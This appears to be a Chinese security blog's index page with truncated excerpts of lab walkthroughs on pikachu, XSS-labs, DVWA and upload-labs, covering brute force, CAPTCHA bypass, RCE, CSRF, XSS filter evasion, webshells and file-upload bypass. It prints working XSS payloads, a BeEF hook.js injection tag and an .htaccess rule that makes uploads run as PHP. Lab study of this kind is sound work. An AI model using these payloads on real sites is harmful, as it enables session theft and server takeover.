pikachu通关回放
本来不打算做的,因为时间紧任务重,但心血来潮,想整这么玩意,献丑了。参考文献:https://blog.csdn.net/weixin_52385170/article/details/128093840
暴力破解基于表单的暴力破解不多说,随便输入一个用户名与密码,直接抓包发送到inturder,设置好爆破即可。只有一个注意点,你要爆几个字段,那么你就要导入多少个字典。之后就开始爆破。观察到有一个数据包的长度明显不同于其他,那么这一对可能匹配。成功
验证码绕过(验证在客户端)直接浏览器禁用js或者验证码复用(把第一次的验证码固定)即可,其他均与上述一致。
验证码绕过(验证在服务器端)这里是发现验证码没有时间限制,也就是可以复用。tips:如何判断验证码是在前端验证还是在后端验证:直接输入一个错误的验证码,看他是否弹窗(弹窗一般是js)但也不全面最有效的是查看源码,后端验证的话验证代码源码看不到;但是前端的话可以看到。
带token参考:https://blog.csdn.net/m0_74977101/article/details/131833702具体操作看上篇文章,这里只讲一下思 ...
RCE|代码以及命令执行漏洞
产生原因在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。分析漏洞产生原因:15:00
漏洞形成条件(缺一不可)1、可控变量2、漏洞函数
具体分析两个小案例略微说明这两种漏洞:5:501、代码执行漏洞典例:php eval()函数:把括号内的语句当作php代码执行。2、命令执行漏洞典例:php system()函数:把()的内容当作当前操作系统cmd命令执行,并可以通过echo输出。3、可以知道,利用这个漏洞,可以对系统产生多样的危害。例如,我可以利用文件上传的函数(代码执行)上传一个木马文件,然后通过命令执行漏洞去执行这个木马。4、此类漏洞相对较前面那几类漏洞在网站的出现几率要小,要具体看网站的作用。如何测试是否存在两种漏洞:23:101、主要是具体情况具体分析,看页面主要是为了完成什么任务。mozhe靶场演示命令执行漏洞(黑盒)–黑盒功能点命令执行-应用功能:28:001、linux下|符号可 ...
CSRF以及SSRF
CSRF基本原理CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。参考:CSRF漏洞详解:https://blog.csdn.net/xcxhzjl/article/details/121411039
实现前提●用户成功登陆了网站系统,能执行授权的功能。!!!●目标用户访问了攻击者构造的恶意URL,比如恶意引导用户点击含有恶意URL的网址。
基本操作CSRF–pikachu演示:5:00检测有无CSRF漏洞:11:401、一般存在于有修改、更新、删除个人信息的页面。2、可以xss配合csrf。
CSRF防御方案1、当用户发送重要的请求时需要输入原始密码。2、设置随机 Token。(最有效)Token:相当于是每一个数据包的编号,若检测当前数据包的Token对应不上,则直 ...
XSS-labs通关little心得
获取cookie:<script>alert(document.cookie)</script>
level-1修改name属性的值,发现页面回显也随之变化,那么我们便可以考虑向此处插入js语句
1<script>alert(1)</script>
点击搜索,成功,直接进入下一关。
level-2直接在搜索框插入以下语句
1<script>alert(1)</script>
发现通关失败。右键-查看元素发现js语句被””号扩了起来,发挥不了作用,那么我们直接利用闭合的思想。填入payload,点击搜索,成功通关。
1"><script>alert(1)</script>
level-3来到第三关,啥也不想,直接把上一关的通关语句填入,失败,那好继续查看元素。发现很奇怪,明明就像第二关一样,利用了闭合的思想,那为什么还是通关不了。这里要用到代码审计,查看源码后端利用htmlspecialchars()函数会将特殊字符进行转义,这里无法采用标签,因为标签都是带有”<”的。但 ...
利用beef实现简单的XSS跨站攻击
前期准备实验环境:kali、BeEF、Ubuntu、DVWA若kali没有配置好BeEF,请参考此文章进行配置:https://blog.csdn.net/weixin_44657888/article/details/124692782若Ubuntu没有搭建好DVWA,请参考此文章进行搭建:https://blog.csdn.net/ydj2200012810/article/details/132009415
开日首先在kali启动BeEF服务。开启后,会自动跳转至登录界面,用户名默认为beef,密码在首次启动beef-xss时需要手动设置。成功登陆后,进入beef主界面然后在Ubuntu打开DVWA,选择存储型XSS名字任意填,消息栏填入以下语句即可
1<script src="http://127.0.0.1:3000/hook.js"></script>
注意,由于前端代码对输入的消息长度有限制,这就导致我们不能完整地输入攻击语句,这个好办右键框框的位置–检查–找到maxlength,改大些而且这里要将你的ip地址换成你的真实ip地 ...
XSS跨站代码以及绕过
XSS跨站绕过过滤的思路与方法httponly绕过什么是httponly在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。注意并不能防止xss漏洞,只能是防止cookie被盗取。
绕过httponly绕过 httponly:利用账号密码进入1、若浏览器未保存帐号密码:需要 xss 产生登录地址(前提是XSS漏洞需要存在于登录框),利用表单劫持(相当于发一份给跨站平台,一份发给服务器验证)。2、若浏览器保存帐号密码:浏览器读取帐号密码。如何绕过httponly:8:00
XSS跨站代码绕过(偏教程演示–配合代码审计)靶场练习(重点):37:00
WAF绕过(以安全狗为例)常见WAF绕过思路1、标签语法替换
12<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <tex ...
跨站订单盗取与webshell箱子反杀
演示简单的XSS订单系统XSS盲打_平台跨站演示:3:00postman下载地址:https://www.postman.com/downloads/
拓展拓展–可二刷(没怎么看懂,好像是通过XSS跨站脚本远程盗取cookie到自己的主机上并保存):15:00-34:30
webshell箱子系统XSS盲打_工具基础名词认识1、后门(backdoor):后门一般是指绕过安全性控制而获取对程序或系统访问的程序,后门原本是开发者预留的用来后期修改程序或系统中存在的威胁,但是由于黑客对后门的恶意使用,使得后门成为了计算机安全得一大威胁,一旦计算机系统或程序中的后们被黑客发现,那么黑客就能轻易地通过后门达到入侵目标计算机 的目的。常见的后门包括:(网页后门)(线程插入后门)(扩展后门)(C/S后门)。后门包括网页后门。2、网站后门(webshell):Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。Webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,JSP脚本木马,也有基于.NET的脚本木马。根据时代 ...
xss跨站基本知识
XSS跨站XSS跨站定义跨站点脚本攻击,简称XSS,是指攻击者利用网站存在的漏洞,通过在网站中注入恶意脚本代码,从而使得用户在访问该网站时受到攻击。这些恶意脚本代码通常是JavaScript 代码,它们可以窃取用户的敏感信息,如用户名、密码等,并将这些信息发送到攻击者的服务器。和用户交互的地方均有可能产生跨站漏洞。
XSS跨站原理XSS攻击的本质是利用Web应用程序中的漏洞,向网页注入恶意脚本代码,然后将这些代码嵌入到网页中,当其他用户访问这个网页时,恶意脚本将会被执行。攻击者通常会在Web应用程序的输入框、评论框、搜索框等可输入内容的地方输入特定的脚本代码,这些代码可以被Web应用程序直接插入到网页中,导致网页上的所有用户都会受到攻击。
1是前端漏洞,感觉和SQL注入差不多,只不过注入的是js语句。js脚本能实现什么,XSS就能实现什么。
XSS跨站前提条件1、浏览器内核版本(IE、或其他高版本浏览器禁用js脚本)。2、js代码的编写。XSS详解
XSS跨站分类1、反射型(危害较小,后端语言进行数据处理)(1)、需要用户(被攻击者)去触发,相当于一次交互的过程。(2)、!! 发包 x ...
记录upload-labs通关过程
使用upload-labs靶场环境:WIN10,php5.3.29
Pass-01代码审计,为js脚本,明显的前端验证(形同虚设),直接禁用js即可。也可以使用第二关的思路,直接抓包,保证MIME值为png/jpg/gif的类型即可。
Pass-02代码审计,发现仅仅是验证MIME属性。直接抓包,保证MIME值为png/jpg/gif的类型即可。
Pass-03(!)代码审计,发现过滤类型为黑名单验证,但不完整。php、php2、php3、php4、php5、php6、php7、pht、phtm、phtml等都会被当成php代码执行,所以上传一个这类类型的文件即可。
Pass-04(!)发现上述类型的也被列入了黑名单,那么可以使用.htaccess(配置文件)文件上传。在upload-labs目录下创建一个.htaccess文件,内容为
123<FilesMatch "shana">SetHandler application/x-httpd-php</FilesMatch>
意思就是如果文件里面有一个 ...


